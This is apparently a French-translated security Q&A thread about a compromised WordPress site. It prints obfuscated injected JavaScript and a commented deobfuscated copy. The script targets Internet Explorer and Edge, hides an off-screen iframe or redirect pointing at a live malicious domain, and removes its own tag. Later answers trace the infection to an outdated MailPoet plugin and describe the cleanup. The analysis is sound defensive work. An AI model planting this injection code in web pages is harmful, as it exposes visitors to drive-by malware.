        var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym=(JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()&&iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX());
        var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh=!CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!!window.chrome&&window.navigator.vendor==="Google Inc.";
        var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT=-1;
        var XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl="http://miwkavoriwka.ml/052F";
        if(LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()&&ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT==1)
            {
            if((navigator.userAgent.match(/iPhone/i))||(navigator.userAgent.match(/iPod/i)))
                {
                location.replace(XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl)
            }
            else
                {
                window.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl;
                document.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl
            }
        }
        else
            {


if((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh&&!LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()))
                    {
                    var DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt="<div style=\"position:absolute;
                    left:-2630px;
                    \"><iframe width=\"21px\" src=\""+XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl+"\" height=\"21px\"></iframe></div>";
                    var lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc=document.getElementsByTagName("div");
                    if(lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length==0)
                        {
                        document.body.innerHTML=document.body.innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                    else
                        {
                        var dl_name=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length;
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy=Math.floor((dl_name/2));
                        lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                }
            }
        }
        pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    }
}
,100);
function pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    {
    var vgZvyjCdzDWwBudHEktBnaagYYYbnZxB="id_8807906";
    if(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB!="none")
        {
        var ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD=document.getElementById(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB);
        if(typeof ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=undefined&&ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=null)
            {
            ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD.outerHTML="";
            delete ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD
        }
    }
};
function iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX()
    {
    if(document.all&&!document.compatMode)
        {
        return true
    }
    else if(document.all&&!window.XMLHttpRequest)
        {
        return true
    }
    else if(document.all&&!document.querySelector)
        {
        return true
    }
    else if(document.all&&!document.addEventListener)
        {
        return true
    }
    else if(document.all&&!window.atob)
        {
        return true
    }
    else if(document.all)
        {
        return true
    }
    else if(typeof navigator.maxTouchPoints!="undefined"&&!document.all&&JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo())
        {
        return true
    }
    else
        {
        return false
    }
}
function JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()
    {
    var zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY=window.navigator.userAgent;
    var TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("MSIE ");
    if(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH)),10)
    }
    var fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Trident/");
    if(fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM>0)
        {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("rv:");
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA+3,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)),10)
    }
    var REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Edge/");
    if(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF)),10)
    }
    return false
}
function LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()
    {
    var pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE=window.navigator.userAgent.toLowerCase();
    if(/(Android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|Kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|Palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE.substr(0,4)))
        {
        return true
    }
    return false
}

Qui est encore un peu obscurci en utilisant le nom de variable "aléatoire". Vous pouvez toujours voir que le code essaie de vous rediriger vers:

hxxp://miwkavoriwka.ml/052F

Quelqu'un sait à quoi sert ce site?

21
Gudradain

J'ai un peu brouillé le code:

var interval = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(interval);
        // only do once per page load
        if (typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"] == "undefined") {
            window["v_bd66b32e1bc6ad91e01318e8278918f0"] = 1;
            // mobile ?
            var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym = (test_for_sepcific_user_agents() && some_capability_check());
            // Android ?
            var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh = !CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT = -1;
            var payload_addr = "http://miwkavoriwka.ml/052F";
            // This branch is never used because -1 != 1
            if (is_mobile_phone() && ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(payload_addr)
                } else {
                    window.location = payload_addr;
                    document.location = payload_addr
                }
            } else {
                if ((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh && !is_mobile_phone())) {
                    var frame_div = "<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\"" + payload_addr + "\" height=\"21px\"></iframe></div>";
                    var divs = document.getElementsByTagName("div");
                    if (divs.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + frame_div
                    } else {
                        var dl_name = divs.length;
                        // why ?
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy = Math.floor((dl_name / 2));
                        divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML = divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML + frame_div
                    }
                }
            }
        }
        remove_script()
    }
}, 100);

function remove_script() {
    // Remove the script (myself)
    var some_id = "id_8807906";
    if (some_id != "none") {
        var some_element = document.getElementById(some_id);
        if (typeof some_element != undefined && some_element != null) {
            some_element.outerHTML = "";
            delete some_element
        }
    }
};

// some capability check
// POssible another mobile phone check ?
function some_capability_check() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && test_for_sepcific_user_agents()) {
        return true
    } else {
        return false
    }
}

function test_for_sepcific_user_agents() {
    var user_agent = window.navigator.userAgent;
    var user_agent_msi_index = user_agent.indexOf("MSIE ");
    if (user_agent_msi_index > 0) {
        return parseInt(user_agent.substring(user_agent_msi_index + 5, user_agent.indexOf(".", user_agent_msi_index)), 10)
    }
    var user_agent_trident_index = user_agent.indexOf("Trident/");
    if (user_agent_trident_index > 0) {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA = user_agent.indexOf("rv:");
        return parseInt(user_agent.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA + 3, user_agent.indexOf(".", AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)), 10)
    }
    var user_agent_Edge_index = user_agent.indexOf("Edge/");
    if (user_agent_Edge_index > 0) {
        return parseInt(user_agent.substring(user_agent_Edge_index + 5, user_agent.indexOf(".", user_agent_Edge_index)), 10)
    }
    return false
}

function is_mobile_phone() {
    var user_agent = window.navigator.userAgent.toLowerCase();
    if (/(Android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|Kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|Palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(user_agent) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(user_agent.substr(0, 4))) {
        return true
    }
    return false
}

Il charge h ** p: //miwkavoriwka.ml/052F (qui est déjà sur certaines listes noires, y compris la liste de protection contre le phishing et les logiciels malveillants FF) dans un iframe ou redirigez vers cette URL (en fonction de votre navigateur)

edit: Après avoir lu un peu le code: Les seuls navigateurs qui semblent ciblés sont ceux où ces conditions sont remplies:

  • Agents utilisateurs contenant [~ # ~] msie [~ # ~] , Trident/ ou Bord/
  • Pas de téléphone portable? (voir fonction is_mobile_phone )
  • Certaines vérifications de capacités sont vraies (voir fonction some_capability_check )
17
SleepProgger

Merci pour toutes les bonnes informations et aide!

J'ai depuis découvert comment le site a été piraté à l'origine. Le site exécutait une ancienne version du plugin Mailpoet/wysija-newsletters (pré 2.6.7)

En utilisant un exploit dans ce plugin, l'attaquant a réussi à télécharger du code malveillant qui a ensuite été utilisé pour infecter davantage le site.

https://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html

En fin de compte, le problème de sécurité avec Mailpoet/wysija-newsletters a été utilisé pour télécharger un fichier appelé .Zip vers/wp-content/uploads/wysija/temp, puis extraire le Zip et installer des thèmes douteux. La capture d'écran ci-jointe montre ce qui s'est passé lors de l'accès à la page d'administration des plugins après la suppression du Zip. Il semble que chaque fois que vous entrez dans wp-admin, le site soit réinfecté.

Le site a maintenant été restauré à partir d'une version propre, entièrement corrigé et le plugin WordFence est en cours d'exécution.

enter image description here

12
bf2mad

C'est objectif apparent est d'infecter wp-settings.php, il infecte donc toutes vos pages et relie les logiciels malveillants via un iframe.

Vous pouvez le supprimer en supprimant wp_inc/upd.php, mais cela ne corrigera le vecteur de menace que si ce trou est bouché. Cependant, "l'infection principale" elle-même peut se trouver dans un fichier différent, si les commentaires sont corrects. Encore une fois, la suppression de ce fichier n'aidera pas beaucoup si le vecteur de menace est toujours là.

ne personne a même suggéré de remplacer eval par alert. D'autres ont déjà brouillé d'autres versions en utilisant les techniques décrites dans ce fil . Votre code suit un modèle très similaire à celui-ci.

6
Mark Buffalo